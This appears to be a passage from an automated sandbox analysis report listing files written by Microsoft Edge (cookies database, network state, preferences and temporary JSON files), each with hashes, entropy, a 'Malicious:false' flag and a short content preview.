                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2a6da0d8-4cfd-4ac4-aa1a-9930f8739191.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.761269762612523
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:tTwN2bQNl0/Dd8hL4v/iEaHqxXcf0L/ZJVb:VwN28N2/Dd8hL4aXqxXI0LhJVb
                                                                                                                                                                                                                                                                                                MD5:E3B6A203D24A437887EFE13E152AE5E2
                                                                                                                                                                                                                                                                                                SHA1:A1ABE0F1545E08BCB15E70B6A0D4E60AA2D754F6
                                                                                                                                                                                                                                                                                                SHA-256:5DCDE0CC406969715DADD5E5505BB7DA1694140B1776CBBEE7369920828EEBA0
                                                                                                                                                                                                                                                                                                SHA-512:0BF8E59E9525454D09422E6577DED07417DA145532918036A68AD8E67D1E03DAB7DB59DB82D8D04FCAE9C21BBE95BB494C4DCE556DCACCC4AE55D0043841EAC3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1768
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.299960161457848
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YcCpfgCzsIWtsUfcKsZleeBkBRsxJCgHxYhbyDF:F2fVWbGkeBkBcTehy
                                                                                                                                                                                                                                                                                                MD5:781B714C99A7CA21996B67BBBFFBD01D
                                                                                                                                                                                                                                                                                                SHA1:776D82B3C79DC8B95B598E9FC6C60F1D2CFBC4CA
                                                                                                                                                                                                                                                                                                SHA-256:F24AAB5A0787AA9CED54BD6786634D9A7EFA8C4DEF480E27A640FE2911C21884
                                                                                                                                                                                                                                                                                                SHA-512:9C4CB9819A2D7E965A516C58B261D1BA9F4BBA714DB23294315981787EEF5FD8DE865817D0AF4822F449370D92646C2B8145B703B5559E63C63B957F68E79C3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383317945645470","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383317950578672","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380819551657533","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2784305022430231
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSDW1U:OIEumQv8m1ccnvSVDHiiYM1a
                                                                                                                                                                                                                                                                                                MD5:AC27F7CCBD21C1BB76B179B322024AC4
                                                                                                                                                                                                                                                                                                SHA1:E3228753B27DBD01E8A21FC2E70C08B2C23ABB63
                                                                                                                                                                                                                                                                                                SHA-256:F4622942430A10CD588A2D07F3F14E185B8B934CDF6AB1A176C527F8100387F3
                                                                                                                                                                                                                                                                                                SHA-512:C1FFBC689379B6A72CC95531E48FC62608A12067C5C11FF2306CB26DBCE54614BEFF7F16E0EF836415306D34F92C765C11F6DDBAF83E9414B3886571B9EA3BCE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2f051.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2f9d7.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF304f3.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a5b8a503-bf06-496c-9de0-a4eda5cfc736.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a8975764-5e24-4190-9009-cde58567fd2a.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b6fbb57c-3a4b-4760-9bd6-e7bc1cdcda72.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e951e740-63d1-4e4b-94d0-22c6c8a48991.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                Size (bytes):1768
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.299960161457848
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YcCpfgCzsIWtsUfcKsZleeBkBRsxJCgHxYhbyDF:F2fVWbGkeBkBcTehy
                                                                                                                                                                                                                                                                                                MD5:781B714C99A7CA21996B67BBBFFBD01D
                                                                                                                                                                                                                                                                                                SHA1:776D82B3C79DC8B95B598E9FC6C60F1D2CFBC4CA
                                                                                                                                                                                                                                                                                                SHA-256:F24AAB5A0787AA9CED54BD6786634D9A7EFA8C4DEF480E27A640FE2911C21884
                                                                                                                                                                                                                                                                                                SHA-512:9C4CB9819A2D7E965A516C58B261D1BA9F4BBA714DB23294315981787EEF5FD8DE865817D0AF4822F449370D92646C2B8145B703B5559E63C63B957F68E79C3C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383317945645470","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13383317950578672","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380819551657533","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA="

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13719
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.234589049081205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNP9ktuYUimDY8EbV+FOdQwaxNPZYJ:stxPGKSu4wsOztJArbGgQwz
                                                                                                                                                                                                                                                                                                MD5:22729E27937C44A3F143830FBCF1ECA2
                                                                                                                                                                                                                                                                                                SHA1:E2662240F980FD708F25413D97533881446A4ED0
                                                                                                                                                                                                                                                                                                SHA-256:CCC1D4F53F0F9C2044465ADA6907862100C4C879571B3A070133777920256890
                                                                                                                                                                                                                                                                                                SHA-512:E70CE793EBA7597830C3A2073B3D5D69EC57EBD52B3317186D152E13A5E9A6A0782876094A51CD6A229524B688BF9C6B278C30B876264334EA6E6BAE15E14EA3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF32461.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13719
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.234589049081205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNP9ktuYUimDY8EbV+FOdQwaxNPZYJ:stxPGKSu4wsOztJArbGgQwz
                                                                                                                                                                                                                                                                                                MD5:22729E27937C44A3F143830FBCF1ECA2
                                                                                                                                                                                                                                                                                                SHA1:E2662240F980FD708F25413D97533881446A4ED0
                                                                                                                                                                                                                                                                                                SHA-256:CCC1D4F53F0F9C2044465ADA6907862100C4C879571B3A070133777920256890
                                                                                                                                                                                                                                                                                                SHA-512:E70CE793EBA7597830C3A2073B3D5D69EC57EBD52B3317186D152E13A5E9A6A0782876094A51CD6A229524B688BF9C6B278C30B876264334EA6E6BAE15E14EA3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF371d6.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13719
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.234589049081205
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stxJ99QTryDigabatSuypwsOzyaNP9ktuYUimDY8EbV+FOdQwaxNPZYJ:stxPGKSu4wsOztJArbGgQwz
                                                                                                                                                                                                                                                                                                MD5:22729E27937C44A3F143830FBCF1ECA2
                                                                                                                                                                                                                                                                                                SHA1:E2662240F980FD708F25413D97533881446A4ED0
                                                                                                                                                                                                                                                                                                SHA-256:CCC1D4F53F0F9C2044465ADA6907862100C4C879571B3A070133777920256890
                                                                                                                                                                                                                                                                                                SHA-512:E70CE793EBA7597830C3A2073B3D5D69EC57EBD52B3317186D152E13A5E9A6A0782876094A51CD6A229524B688BF9C6B278C30B876264334EA6E6BAE15E14EA3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380725943535883","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

